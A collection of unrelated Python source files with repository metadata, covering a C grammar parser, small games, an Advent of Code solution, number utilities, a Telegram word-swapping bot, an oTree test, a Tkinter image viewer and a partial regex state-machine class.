def p_unary_expression_1(self, p):
""" unary_expression : postfix_expression """
p[0] = p[1]
def p_unary_expression_2(self, p):
""" unary_expression : PLUSPLUS unary_expression
| MINUSMINUS unary_expression
| unary_operator cast_expression
"""
p[0] = c_ast.UnaryOp(p[1], p[2], p[2].coord)
def p_unary_expression_3(self, p):
""" unary_expression : SIZEOF unary_expression
| SIZEOF LPAREN type_name RPAREN
"""
p[0] = c_ast.UnaryOp(
p[1],
p[2] if len(p) == 3 else p[3],
self._token_coord(p, 1))
def p_unary_operator(self, p):
""" unary_operator : AND
| TIMES
| PLUS
| MINUS
| NOT
| LNOT
"""
p[0] = p[1]
def p_postfix_expression_1(self, p):
""" postfix_expression : primary_expression """
p[0] = p[1]
def p_postfix_expression_2(self, p):
""" postfix_expression : postfix_expression LBRACKET expression RBRACKET """
p[0] = c_ast.ArrayRef(p[1], p[3], p[1].coord)
def p_postfix_expression_3(self, p):
""" postfix_expression : postfix_expression LPAREN argument_expression_list RPAREN
| postfix_expression LPAREN RPAREN
"""
p[0] = c_ast.FuncCall(p[1], p[3] if len(p) == 5 else None, p[1].coord)
def p_postfix_expression_4(self, p):
""" postfix_expression : postfix_expression PERIOD ID
| postfix_expression PERIOD TYPEID
| postfix_expression ARROW ID
| postfix_expression ARROW TYPEID
"""
field = c_ast.ID(p[3], self._token_coord(p, 3))
p[0] = c_ast.StructRef(p[1], p[2], field, p[1].coord)
def p_postfix_expression_5(self, p):
""" postfix_expression : postfix_expression PLUSPLUS
| postfix_expression MINUSMINUS
"""
p[0] = c_ast.UnaryOp('p' + p[2], p[1], p[1].coord)
def p_postfix_expression_6(self, p):
""" postfix_expression : LPAREN type_name RPAREN brace_open initializer_list brace_close
| LPAREN type_name RPAREN brace_open initializer_list COMMA brace_close
"""
p[0] = c_ast.CompoundLiteral(p[2], p[5])
def p_primary_expression_1(self, p):
""" primary_expression : identifier """
p[0] = p[1]
def p_primary_expression_2(self, p):
""" primary_expression : constant """
p[0] = p[1]
def p_primary_expression_3(self, p):
""" primary_expression : unified_string_literal
| unified_wstring_literal
"""
p[0] = p[1]
def p_primary_expression_4(self, p):
""" primary_expression : LPAREN expression RPAREN """
p[0] = p[2]
def p_primary_expression_5(self, p):
""" primary_expression : OFFSETOF LPAREN type_name COMMA offsetof_member_designator RPAREN
"""
coord = self._token_coord(p, 1)
p[0] = c_ast.FuncCall(c_ast.ID(p[1], coord),
c_ast.ExprList([p[3], p[5]], coord),
coord)
def p_offsetof_member_designator(self, p):
""" offsetof_member_designator : identifier
| offsetof_member_designator PERIOD identifier
| offsetof_member_designator LBRACKET expression RBRACKET
"""
if len(p) == 2:
p[0] = p[1]
elif len(p) == 4:
p[0] = c_ast.StructRef(p[1], p[2], p[3], p[1].coord)
elif len(p) == 5:
p[0] = c_ast.ArrayRef(p[1], p[3], p[1].coord)
else:
raise NotImplementedError("Unexpected parsing state. len(p): %u" % len(p))
def p_argument_expression_list(self, p):
""" argument_expression_list : assignment_expression
| argument_expression_list COMMA assignment_expression
"""
if len(p) == 2: # single expr
p[0] = c_ast.ExprList([p[1]], p[1].coord)
else:
p[1].exprs.append(p[3])
p[0] = p[1]
def p_identifier(self, p):
""" identifier : ID """
p[0] = c_ast.ID(p[1], self._token_coord(p, 1))
def p_constant_1(self, p):
""" constant : INT_CONST_DEC
| INT_CONST_OCT
| INT_CONST_HEX
| INT_CONST_BIN
| INT_CONST_CHAR
"""
uCount = 0
lCount = 0
for x in p[1][-3:]:
if x in ('l', 'L'):
lCount += 1
elif x in ('u', 'U'):
uCount += 1
t = ''
if uCount > 1:
raise ValueError('Constant cannot have more than one u/U suffix.')
elif lCount > 2:
raise ValueError('Constant cannot have more than two l/L suffix.')
prefix = 'unsigned ' * uCount + 'long ' * lCount
p[0] = c_ast.Constant(
prefix + 'int', p[1], self._token_coord(p, 1))
def p_constant_2(self, p):
""" constant : FLOAT_CONST
| HEX_FLOAT_CONST
"""
if 'x' in p[1].lower():
t = 'float'
else:
if p[1][-1] in ('f', 'F'):
t = 'float'
elif p[1][-1] in ('l', 'L'):
t = 'long double'
else:
t = 'double'
p[0] = c_ast.Constant(
t, p[1], self._token_coord(p, 1))
def p_constant_3(self, p):
""" constant : CHAR_CONST
| WCHAR_CONST
"""
p[0] = c_ast.Constant(
'char', p[1], self._token_coord(p, 1))
# The "unified" string and wstring literal rules are for supporting
# concatenation of adjacent string literals.
# I.e. "hello " "world" is seen by the C compiler as a single string literal
# with the value "hello world"
#
def p_unified_string_literal(self, p):
""" unified_string_literal : STRING_LITERAL
| unified_string_literal STRING_LITERAL
"""
if len(p) == 2: # single literal
p[0] = c_ast.Constant(
'string', p[1], self._token_coord(p, 1))
else:
p[1].value = p[1].value[:-1] + p[2][1:]
p[0] = p[1]
def p_unified_wstring_literal(self, p):
""" unified_wstring_literal : WSTRING_LITERAL
| unified_wstring_literal WSTRING_LITERAL
"""
if len(p) == 2: # single literal
p[0] = c_ast.Constant(
'string', p[1], self._token_coord(p, 1))
else:
p[1].value = p[1].value.rstrip()[:-1] + p[2][2:]
p[0] = p[1]
def p_comment_cond_statement(self, p):
""" comment_cond_statement : COMMENTCOND COMMENTSTR
| COMMENTACTION COMMENTSTR
"""
p[0] = c_ast.CommentCond(p[1], p[2])
def p_brace_open(self, p):
""" brace_open : LBRACE
"""
p[0] = p[1]
p.set_lineno(0, p.lineno(1))
def p_brace_close(self, p):
""" brace_close : RBRACE
"""
p[0] = p[1]
p.set_lineno(0, p.lineno(1))
def p_empty(self, p):
'empty : '
p[0] = None
def p_error(self, p):
# If error recovery is added here in the future, make sure
# _get_yacc_lookahead_token still works!
#
if p:
self._parse_error(
'before: %s' % p.value,
self._coord(lineno=p.lineno,
column=self.clex.find_tok_column(p)))
else:
self._parse_error('At end of input', self.clex.filename)
| [
"ligongming168@163.com"
] | ligongming168@163.com |
e6d2b5fe6f232ae369c8e0bf48ffeefacedd70f2 | b7b3ca7e4793aaa4972b6fcb76cbf0d39344b88b | /__init__.py | 327c37073bdebe7f3e90160a77b3104c62154fce | [] | no_license | parenthetical-e/similarity | b45b68c7bb2805535526e628c865af0f081f4d22 | 83a679b61aa12aa770897f8f840584724c964da7 | refs/heads/master | 2016-09-11T04:02:45.395812 | 2012-06-21T18:33:28 | 2012-06-21T18:33:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32 | py | import category
import distance
| [
"Erik.Exists@gmail.com"
] | Erik.Exists@gmail.com |
e2692712f8fd275f7110d82131ecccfd6a3d0580 | aba4d16d8ec734eb8838e150d425f6c9d8e146bc | /game.py | b460e31979089a2782bd696568c2b33dc9422aee | [] | no_license | 666stephunter/game | b0682f02ab72e757389b00a31cd0cf0799cf220f | 89f7c962bf6d312786f0920662d6d58327d3a968 | refs/heads/master | 2020-05-24T15:31:57.512296 | 2019-05-18T08:33:51 | 2019-05-18T08:33:51 | 187,333,667 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,007 | py | from livewires import games, color
import random
games.init(screen_width=840, screen_height=480, fps=50)
class Hero(games.Sprite):
image = games.load_image('img/ship.png')
MISSILE_DELAY = 40
def __init__(self, x = 30, y=240):
super(Hero, self).__init__(image=Hero.image,
x=x,y=y
)
self.missile_wait = 0
def update(self):
if games.keyboard.is_pressed(games.K_DOWN):
self.y += 4
if games.keyboard.is_pressed(games.K_UP):
self.y -= 4
if self.missile_wait > 0:
self.missile_wait -= 1
if games.keyboard.is_pressed(games.K_SPACE) and self.missile_wait==0:
new_missile = Missile(self.x, self.y)
games.screen.add(new_missile)
self.missile_wait = Hero.MISSILE_DELAY
class Rocket(games.Sprite):
image = games.load_image('img/flash.png')
speed = -3
def __init__(self, y,x=820):
super(Rocket, self).__init__(image=Rocket.image,
x=x,
y=y,
dx=Rocket.speed)
def smert(self):
self.destroy()
def update(self):
for _ in self.overlapping_sprites:
if not games.keyboard.is_pressed(games.K_SPACE):
for sprite in self.overlapping_sprites:
sprite.destroy()
self.destroy()
def update(self):
if self.left < 0:
self.end_game()
def end_game(self):
end_msg = games.Message(value='Вы проиграли!',
size=90,
color=color.red,
x=games.screen.width / 2,
y=games.screen.height / 2,
lifetime=5 * games.screen.fps,
after_death=games.screen.quit
)
games.screen.add(end_msg)
class Evil(games.Sprite):
image = games.load_image('img/monster.png')
def __init__(self, speed=2, odds_change=200):
super(Evil, self).__init__(image=Evil.image,
x=810,
y=games.screen.height / 2,
dy=speed)
self.odds_change = odds_change
self.time_til_drop = 0
def update(self):
if self.bottom > 480 or self.top < 0:
self.dy = -self.dy
elif random.randrange(self.odds_change) == 0:
self.dy = -self.dy
self.check_drop()
def check_drop(self):
if self.time_til_drop > 0:
self.time_til_drop -= 1
else:
new_rocket = Rocket(y=self.y, x = 750)
games.screen.add(new_rocket)
self.time_til_drop = random.randint(30, 100)
class Missile(games.Sprite):
image = games.load_image('img/fireworks.png')
VELOCITY_FACTOR = 30
LIFETIME = 20
def __init__(self,hero_x,hero_y):
x = hero_x
y = hero_y
dx = Missile.VELOCITY_FACTOR
super(Missile, self).__init__(image=Missile.image,
x=x+100,
y=y,
dx=dx,
)
self.lifetime = Missile.LIFETIME
self.score = games.Text(value=0,
size=30,
right=games.screen.width - 10,
color=color.yellow,
top=5
)
games.screen.add(self.score)
def boom(self):
for rocket in self.overlapping_sprites:
rocket.handle_caught()
self.score.value += 1
def handle_caught(self):
self.destroy()
def smert(self):
pass
def update(self):
if self.overlapping_sprites:
for sprite in self.overlapping_sprites:
sprite.smert()
self.destroy()
self.lifetime -= 1
if self.lifetime == 0:
self.destroy()
#self.boom()
class Game:
def __init__(self):
self.the_hero = Hero()
games.screen.add(self.the_hero)
def start(self):
wall_image = games.load_image('img/space.jpg', transparent=False)
games.screen.background = wall_image
games.music.load('music/theme.wav')
games.music.play()
def main():
start = Game()
start.start()
the_hero = Hero()
games.screen.add(the_hero)
the_evil = Evil()
games.screen.add(the_evil)
games.screen.mainloop()
if __name__ == '__main__':
main()
| [
"noreply@github.com"
] | 666stephunter.noreply@github.com |
68e0d384def2d5d2eabef9e1b1dde67527ab8fbf | 859324ecd7373b398461f005684a32985cb8dcb1 | /2020/22-python/combat.py | 3e149a10d58d601d1aa92db7709c879227a8f4a1 | [] | no_license | gucce/advent-of-code | 14c687375b5b38ca1f625e45535eec13a1334815 | 491ea7d2f51d39d6c440d7df7c0d13cc390eb764 | refs/heads/master | 2021-06-09T22:45:56.857066 | 2020-12-22T15:47:38 | 2020-12-22T15:47:38 | 158,203,043 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,482 | py | from typing import List
def read_file(file_path):
with open(file_path, 'r', encoding="UTF-8") as f:
return f.read().strip()
class Combat:
def __init__(self, input_data: str):
p1, p2 = input_data.strip().split('\n\n')
self.player_one = self.parse_player(p1)
self.player_two = self.parse_player(p2)
def play(self) -> bool:
if not (self.player_one and self.player_two):
return False
card1 = self.player_one.pop()
card2 = self.player_two.pop()
if card1 >= card2:
self.player_one.insert(0, card1)
self.player_one.insert(0, card2)
else:
self.player_two.insert(0, card2)
self.player_two.insert(0, card1)
return True
@staticmethod
def calc_score(cards: List[int]):
score = 0
for idx, c in enumerate(cards):
score += (idx + 1) * c
return score
def part1(self) -> int:
while self.play():
pass
return self.calc_score(self.player_one) if self.player_one else self.calc_score(self.player_two)
def part2(self) -> int:
return 1
def parse_player(self, cards: str) -> List[int]:
return list(reversed([int(c) for c in cards.splitlines()[1:]]))
def main():
c1 = Combat(read_file('input'))
c2 = Combat(read_file('input'))
print('Part 1: ', c1.part1())
print('Part 2: ', c2.part2())
if __name__ == '__main__':
main()
| [
"Christian.Guggenmos@bmw.de"
] | Christian.Guggenmos@bmw.de |
a13d8c61c6413969c2c13d8696d02ad6603481c6 | d54869631b5ce16bc5f54b944ccda20ba22eface | /drawplayer.py | 7dd506e0de2fad5b21dbf079bc56da9b13173dd8 | [] | no_license | manasreldin/monte-carlo-tree-search | 0b7d1c462d58bf5834aed33df8f131ff05693ba9 | 95edca506ae99895fcfbbd6d47448ff4bd4b4055 | refs/heads/master | 2022-07-03T07:22:28.446953 | 2020-05-10T18:41:20 | 2020-05-10T18:41:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 234 | py | class DrawPlayer:
def __init__(self, name: str):
self.name = name
def __repr__(self):
return f'Player {self.name}'
def __hash__(self):
return hash(self.name)
OnlyDrawPlayer = DrawPlayer('Draw')
| [
"shehabyasser@gmail.com"
] | shehabyasser@gmail.com |
b31b6630d2fe8dafff1586f89d1536aafde60a02 | 5ec5a9666864ce4b548dbb43a2fcf86a11f6dc90 | /22/Utils.py | a88399cac107ca55d72f432f5ae4e874b3afc89b | [
"MIT"
] | permissive | bobismijnnaam/bobe-euler | 24f32341d01b3bc11bb8de778d8ad5369b1bb81e | 111abdf37256d19c4a8c4e1a071db52929acf9d9 | refs/heads/master | 2021-01-10T19:59:35.559134 | 2017-11-15T09:25:52 | 2017-11-15T09:25:52 | 24,141,082 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,538 | py | import collections
class BigInt:
def __init__(self):
self.number = [0]
def skim(self):
carrier = 0
for i in range(0, len(self.number)):
self.number[i] += carrier
head = self.number[i] % 10
carrier = (self.number[i] - head) / 10
self.number[i] = int(head)
while carrier != 0:
head = carrier % 10
carrier = (carrier - head) / 10
self.number.append(int(head))
def add(self, factor):
self.number[0] += factor
self.skim();
def mul(self, factor):
for i in range(0, len(self.number)):
self.number[i] *= factor
self.skim()
def getNumberArray(self):
return list(self.number)
def toString(self):
result = ""
for i in self.number:
result += str(i)
return result
class NumberJuggler:
def __init__(self):
with open("primes.txt") as f:
content = f.readlines()
primes = []
for line in content:
primes.append(int(line))
self.primes = primes
def getFactorization(self, num):
factorisation = collections.defaultdict(int)
countdown = num
for prime in self.primes:
if countdown == 1: break
while countdown % prime == 0:
countdown = countdown // prime
factorisation[prime] += 1
return factorisation
def getPrimeFactors(self, num):
return list(getFactorization(num).keys())
def getDivisors(self, num):
if num == 1: return [1]
factorization = self.getFactorization(num)
factors = list(factorization.keys())
factorCounts = [0] * len(factors)
factorCounts[0] = 1
run = True
divisors = [1]
while run:
divisor = 1;
for j in range(0, len(factors)):
if factorCounts[j] != 0:
divisor *= factors[j]**factorCounts[j]
if divisor != num:
divisors.append(divisor)
factorCounts[0] += 1
for j in range(0, len(factorCounts)):
if factorCounts[j] == factorization[factors[j]] + 1:
if j == len(factorCounts) - 1:
run = False
break
else:
factorCounts[j] = 0;
factorCounts[j + 1] += 1
return divisors
def mergeSort(array):
if len(array) <= 1:
return array[:]
else:
mid = len(array) // 2
left = mergeSort(array[:mid])
right = mergeSort(array[mid:])
result = []
while len(left) > 0 and len(right) > 0:
if left[0] < right[0]:
result.append(left.pop(0))
else:
result.append(right.pop(0))
if len(left) > 0:
result.extend(left)
elif len(right) > 0:
result.extend(right)
return result
| [
"bobrubbens@gmail.com"
] | bobrubbens@gmail.com |
42e42adb39702f2462200f2fd219c3c4258675db | c5d2e624675fea0ce3bf5f8c84e47bb0cae0c412 | /hw_3/bot.py | 609054fc70233019770b085ff26ce1a182898d40 | [] | no_license | tanyashar/hse-2.2 | 4afa79197baa28aa4496570ac2d62ad150dd56b6 | 66c318cd350c56099101a316a24d144efd62dc8f | refs/heads/master | 2021-06-19T06:05:10.014209 | 2017-06-20T23:50:47 | 2017-06-20T23:50:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,612 | py | # -*- coding: utf-8 -*-
import flask
import telebot
import conf
import json
import random
import re
import pymorphy2
from pymorphy2 import MorphAnalyzer
morph = MorphAnalyzer()
def find_words(text):
regexp = re.compile('[a-zA-Z0-9-]+', flags = re.U | re.DOTALL)
lst = regexp.findall(text)
return lst
def find_words_rus(text):
regexp = re.compile('[^а-яА-Я0-9-]+', flags = re.U | re.DOTALL)
lst = regexp.findall(text)
return lst
def make_text(text):
lst = json.load(open('/home/tanyashar/mysite/lemmas.json', 'r', encoding='utf-8'))
ct = 0
if len(text) != 0:
for i in range(len(text)-1,0,-1):
if text[i] != ' ':
break
else:
ct += 1
text = text[0:len(text)-ct]
s = text.split(' ')
ss=[]
for i in s:
symb = find_words_rus(i)
if len(symb)!=0:
if len(i)-len(symb[0]) != 0:
ss.append(i[0:len(i)-len(symb[0])])
ss.append(symb[0])
else:
ss.append(i)
l = ['NPRO', 'PREP', 'CONJ', 'PRCL']
#чтобы сохранить согласование, меняем любые части речи, кроме местоимений-существительных, предлогов, союзов и частиц
final_text=''
capital=0
for i in ss:
if not ('а'<=i[0]<='я' or 'А'<=i[0]<='Я'):
if i[0]=='-':
final_text += ' '
final_text += i
continue
capital = 0
if 'А'<=i[0]<='Я':
capital = 1
word = morph.parse(i)[0]
if word.tag.POS not in l:
new_word = morph.parse(random.choice(lst))[0]
while word.normalized.tag != new_word.normalized.tag:
new_word = morph.parse(random.choice(lst))[0]
forms = set(find_words(str(word.tag))[1:])
ft = new_word.inflect(forms).word
if 'Name' in forms or 'Geox' in forms or 'Surn' in forms or 'Patr' in forms or 'Orgn' in forms or 'Trad' in forms:
ft = ft[0].upper() + ft[1:]
if 'Abbr' in forms:
ft = ft.upper()
else:
ft = word.word
if capital == 1:
ft = ft[0].upper() + ft[1:]
if len(final_text)!=0 and final_text[len(final_text)-1]!=' ':
final_text += ' '
final_text += ft
return final_text
WEBHOOK_URL_BASE = "https://{}:{}".format(conf.WEBHOOK_HOST, conf.WEBHOOK_PORT)
WEBHOOK_URL_PATH = "/{}/".format(conf.TOKEN)
bot = telebot.TeleBot(conf.TOKEN, threaded=False)
bot.remove_webhook()
bot.set_webhook(url=WEBHOOK_URL_BASE+WEBHOOK_URL_PATH)
app = flask.Flask(__name__)
@bot.message_handler(commands=['start', 'help'])
def send_welcome(message):
bot.send_message(message.chat.id, "Здравствуйте! Это бот, который будет вас передразнивать.")
@bot.message_handler(func=lambda m: True)
def send_len(message):
final_text = make_text(message.text)
bot.send_message(message.chat.id, final_text)
@app.route('/', methods=['GET', 'HEAD'])
def index():
return 'check OK'
@app.route(WEBHOOK_URL_PATH, methods=['POST'])
def webhook():
if flask.request.headers.get('content-type') == 'application/json':
json_string = flask.request.get_data().decode('utf-8')
update = telebot.types.Update.de_json(json_string)
bot.process_new_updates([update])
return ''
else:
flask.abort(403)
| [
"noreply@github.com"
] | tanyashar.noreply@github.com |
306fd59ef703a1513986c2b953cf95121906f645 | 7149126b143a87f15b125f02c6293a1588c14d9c | /0_otree_app/bret/tests.py | 972b242c0a62dc0602905772d3bac833b012e80b | [
"MIT"
] | permissive | victorvanpelt/control_asymmetry | f23370df1c02b56320943ee1b6bc52212b1198ff | 819a9523ab30a7eb1f91ff0dad11e607569b3a9e | refs/heads/master | 2023-04-17T09:50:03.690226 | 2021-05-04T09:32:07 | 2021-05-04T09:32:07 | 237,804,011 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,096 | py | # -*- coding: utf-8 -*-
from __future__ import division
import random
from otree.common import Currency as c, currency_range
from . import pages
from ._builtin import Bot
from .models import Constants
class PlayerBot(Bot):
cases = ['always_bomb', 'never_bomb']
def play_round(self):
if Constants.instructions and self.player.round_number == 1:
yield (pages.Instructions, {'accept_conditions': True})
boxes_collected = 50
yield (
pages.Decision,
{
'bomb_row': 1, 'bomb_col': 1, 'boxes_collected': boxes_collected,
'bomb': 1 if self.case == 'always_bomb' else 0
}
)
expected_round_result = 0 if self.case == 'always_bomb' else Constants.box_value * boxes_collected
assert self.player.round_result == expected_round_result
if Constants.results and self.player.round_number == Constants.num_rounds:
# 1 round is chosen randomly
assert self.participant.vars['bret_payoff'] == expected_round_result
yield pages.Results
| [
"v.f.j.vanpelt@tilburguniversity.edu"
] | v.f.j.vanpelt@tilburguniversity.edu |
81782888a237836b72cab0f463e135921685cf2d | 067e7023fc67b0aeb8ab3ab498be0dcf3b7ee93e | /cases/cases_info/he_deployment.py | 6f5c49a48b7acb4351eb66174e4795dbebe1081b | [] | no_license | kimettog/cockpit-auto | a054d943ee1e9f026f0efe90723a013f4a47ba3b | 1028cc39fc3dec135be1eef20d2ea8c92ea2132b | refs/heads/master | 2021-09-07T18:40:51.927489 | 2018-02-27T12:11:54 | 2018-02-27T12:11:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,342 | py | # test_hosted_engine_deployment
from collections import OrderedDict
cases_t = (
('RHEVM-23815', 'check_he_otopi_install'),
('RHEVM-24594', 'check_he_hint'),
('RHEVM-23817', 'check_engine_status'),
('RHEVM-23819', 'check_vm_status'),
('RHEVM-23832', 'check_no_large_messages'),
('RHEVM-23833', 'check_no_password_saved'),
('RHEVM-23816', 'check_additional_host'),
('RHEVM-23826', 'check_put_local_maintenance'),
('RHEVM-23829', 'check_migrate_he'),
('RHEVM-23828', 'check_put_global_maintenance'),
('RHEVM-23827', 'check_remove_from_maintenance'),
('RHEVM-25065', 'check_he_clean'),
('RHEVM-23834', 'check_he_redeploy')
)
cases = OrderedDict(cases_t)
config = {
'rhvm_appliance_path': 'http://10.66.10.22:8090/rhevm-appliance/',
'storage_type': 'nfs',
'nfs_ip': '10.66.148.11',
'nfs_password': 'redhat',
'he_install_nfs': '/home/jiawu/nfs3',
'he_data_nfs': '/home/jiawu/nfs4',
'sd_name': 'heauto-sd',
'he_vm_mac': '52:54:00:5e:8e:c7',
'he_vm_fqdn': 'rhevh-hostedengine-vm-04.lab.eng.pek2.redhat.com',
'he_vm_domain': 'lab.eng.pek2.redhat.com',
'he_vm_ip': '10.73.73.100',
'he_vm_password': 'redhat',
'engine_password': 'password',
'second_host': '10.73.73.15',
'second_password': 'redhat',
'second_vm_fqdn': 'cockpit-vm',
}
| [
"yzhao@redhat.com"
] | yzhao@redhat.com |
a0ea550899adfc525da0d29fa0b2b9edb068c27d | 32e28c066dba6311015ae9ad318ec707f96dc5d9 | /Datesplit.py | 67096c74027e924747819a0d2d73f2a3356f83de | [] | no_license | Tanvippatel/pythondatascrape | c51ffe11e7b592f6058d3a1fb70509e85f960c80 | ec10ecafb2929a2e8c9b6a95a107ba8837a4bd6d | refs/heads/main | 2023-05-15T02:18:05.793862 | 2021-06-14T05:29:19 | 2021-06-14T05:29:19 | 375,595,031 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 110 | py |
import re
str = 'Date: 2004 - 2010'
chunks = re.split('[:-]',str)
for chunk in chunks:
print(chunk)
| [
"noreply@github.com"
] | Tanvippatel.noreply@github.com |
5850af25d4b360896d8e3d1ca94803dd606025ac | af6e713b0830d99f826b50da67a61c3771ce4fd2 | /Image_viewer_app.py | 34734a6ad7ba12a03b1d34f790da6d9cec3369ec | [] | no_license | JakeMcKean-code/Image-Viewer | 0b3edb1ec8a81321468f8061b56337eb87cd6da3 | 037fff5f09d799c232a15dfe7feae7cb3bdc6ea9 | refs/heads/main | 2023-08-23T16:36:36.019160 | 2021-09-26T19:52:08 | 2021-09-26T19:52:08 | 410,647,812 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,774 | py | """
Created on Sunday Sep 26 17:32:16 2021
@author: Jake McKean
"""
# --------------------------------------------------------------
# Use the os package to list all the files in my images directory and then
# append them all to a list
from os.path import join
import os
import glob
from PIL import ImageTk, ImageFile
import PIL.Image
from tkinter import *
from tkinter import Label
from tkinter import Button
from tkinter import Tk
from tkinter.filedialog import askdirectory
from tkinter import messagebox
# --------------------------------------------------------------
class window():
def __init__(self, master):
self.master = master
master.geometry("1100x750")
master.title("Image Viewer")
self.image_list = []
self.files = []
self.image_num = 0
master.configure(bg='#355C7D')
# First screen of the application
def open_directory_screen(self):
self.path_to_directory = StringVar()
self.frame = LabelFrame(self.master, padx = 20, pady = 10) # padding here controls the padding inside the frame
self.frame.configure(bg='#6C5B7B')
self.frame.grid(row = 2, column = 1, padx = 470, pady=250) # padding here controls how sunken in the frame is in the window
self.Set_button = Button(self.frame, text = "Press to view images", command = self.open_directory)
self.Set_button.grid(row = 6, column = 0, columnspan = 3, pady=20)
self.File_button = Button(self.frame, text = "Choose image directory", command = self.get_directory)
self.File_button.grid(row = 3, column = 0, pady = 20)
return
def get_directory(self):
path = askdirectory()
self.path_to_directory.set(path)
return
def open_directory(self):
self.SAVE_PATH = self.path_to_directory.get()
self.remove_window(self.frame)
return
def forward(self, image_number):
self.back_button = Button(root, text = "<<", command = lambda: self.backward(self.image_num))
self.back_button.grid(row = 1, column = 1)
# delete image and redefine the label with the new image
if(image_number < (len(self.image_list)-1)):
self.my_label.grid_forget()
self.my_label = Label(image = self.image_list[self.image_num+1], padx = 10, pady = 20)
self.image_num += 1
self.my_label.grid(row = 0, column = 1, columnspan = 3)
if(self.image_num == len(self.image_list)-1):
self.forward_button = Button(root, text = ">>", state = DISABLED)
self.forward_button.grid(row = 1, column = 3)
# Text for status bar
status_text = "Image " + str(self.image_num + 1) + " of " + str(len(self.image_list))
self.status = Label(root,text = status_text, bd = 1, relief = SUNKEN)
self.status.grid(row = 2, column = 3)
return
def backward(self, image_number):
# delete image and redefine the label with the new image
if(self.image_num ==1):
self.back_button = Button(root, text = "<<", state = DISABLED)
self.back_button.grid(row = 1, column = 1)
if(image_number != 0):
self.forward_button = Button(root, text = ">>", command = lambda: self.forward(self.image_num))
self.forward_button.grid(row = 1, column = 3)
self.my_label.grid_forget()
self.image_num -= 1
self.my_label = Label(image = self.image_list[self.image_num-1], padx = 10, pady = 20)
self.my_label.grid(row = 0, column = 1, columnspan = 3)
# Text or status bar
status_text = "Image " + str(self.image_num+1) + " of " + str(len(self.image_list))
self.status = Label(root,text = status_text, bd = 1, relief = SUNKEN)
self.status.grid(row = 2, column = 3)
return
# Second screen of the application
def second_frame(self):
# element in the file
for filename in glob.glob(os.path.join(self.SAVE_PATH,"*.png")):
self.files.append(filename)
for j in self.files:
self.image_list.append(ImageTk.PhotoImage(PIL.Image.open(join(self.SAVE_PATH,j)).resize((1000,600))))
self.my_label = Label(image = self.image_list[self.image_num], padx = 10, pady = 20)
self.my_label.grid(row = 0, column = 1, columnspan = 3)
# Create the back button
self.back_button = Button(root, text = "<<", command = lambda: self.backward(self.image_num))
if(self.image_num ==0):
self.back_button = Button(root, text = "<<", state = DISABLED)
self.back_button.grid(row = 1, column = 1)
# Creating an exit button
self.quit_button = Button(root, text = "press to exit", command = self.master.quit)
# Creating the forward button
self.forward_button = Button(root, text = ">>", command = lambda: self.forward(self.image_num + 1))
self.back_button.grid(row = 1, column = 1)
self.quit_button.grid(row = 1, column = 2)
self.forward_button.grid(row = 1, column = 3, pady=10)
# Create a status label
status_text = "Image " + str(self.image_num+1) + " of " + str(len(self.image_list))
self.status = Label(root,text = status_text, bd = 1, relief = SUNKEN)
self.status.grid(row = 2, column = 3)
return
def remove_window(self, frame, first_time = True):
frame.destroy()
if(first_time == True):
self.Set_button.destroy()
self.second_frame()
return
# --------------------------------------------------------------
root = Tk()
gui = window(root)
gui.open_directory_screen()
root.mainloop()
root.mainloop()
| [
"noreply@github.com"
] | JakeMcKean-code.noreply@github.com |
d87523e61d9d27689d257f0466bccb56af247722 | 9857ba3ab06755d6c559f5a27662945f260b9ece | /nfsm.py | 35a4dfafbcaa5b37321ecd08a2f6c67c8c376034 | [] | no_license | brownan/regescrossword | dd91c80be40a8f151ad6855b7535a8945aec0c38 | 53003074df87d293fed84a73081853004d071f3d | refs/heads/master | 2020-08-27T04:30:56.072995 | 2013-03-12T23:49:07 | 2013-03-12T23:49:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,599 | py | #!/bin/env python3
from copy import deepcopy
from itertools import product
from functools import reduce
from operator import add
import io
"""
nfsm.py - Nondeterministic finite state machine.
"""
class NFSM:
"""This class implements a non-deterministic finite state machine that
matches a string of fixed, finite length. It is initialized with a string
representing a regular expression, and an alphabet.
Initialized objects have an internal state of "slots". Each slot represents
a single character in the string to match, but each slot object holds a set
of possible characters from the alphabet that could possibly belong in the
slot given the constraints.
This doesn't support full regular expression syntax. Non-exhaustive list of
things that are not supported and will result in undefined behavior:
* Only a single level of parenthesis allowed. No nesting.
* A reference to a group that may or may not be matched under all
circumstances e.g. (A)?\1
* A group that is quantified or repeated. e.g. (A)+\1
* A reference to a forward group or a reference to a group from within the
group. e.g. \1(A) (A\2)
(I'm not sure what would happen in a more compliant regex implementation
anyways)
"""
def __init__(self, regex, length, alphabet):
# The finite state machine is represented as a number of "chains". Each
# chain is a list of sets. Each set is a set of characters that could
# go in that slot. For example, the regex 'AB+[^B]*' of length 4 over the
# alphabet ABC would be represented with
# [
# [set('A'), set('B'), set('B'), set('B')],
# [set('A'), set('B'), set('B'), set('AC')],
# [set('A'), set('B'), set('AC'), set('AC')],
# ]
# When constraints are added, the constraint set is intersected with
# that index of each chain. If any chain has an empty set, it is
# removed from consideration.
self.chains = []
self.length = length
self.alphabet = frozenset(alphabet)
unflattened_chains = list(self._parse_regex_part(regex))
#print("{0!r} → {1}".format(regex, unflattened_chains))
# Derefernce backrefereces and flatten chains
for chain in unflattened_chains:
# Flatten and dereference this chain, then add it to self.chains
groups = []
flattened = []
for item in chain:
if isinstance(item, list):
flattened.extend(item)
groups.append(item)
else:
flattened.append(item)
dereferenced = []
for item in flattened:
if isinstance(item, int):
dereferenced.extend(groups[item])
else:
dereferenced.append(item)
self.chains.append(dereferenced)
#print("{0!r} → {1}".format(regex, self.chains))
# and, since we are given the length of the string we match...
self.chains = [chain for chain in self.chains if len(chain) == self.length]
#print("{0!r} → {1}".format(regex, self.chains))
def _parse_regex_part(self, regex):
"""This recursive method takes a regex and parses it, yielding a series
of chain lists that together match this regex
Each chain returned is a list. Each item in the list may be one of
three things:
* A set containing the elements from the alphabet which this slot may
contain
* An integer referring to a group number from a group previously
defined
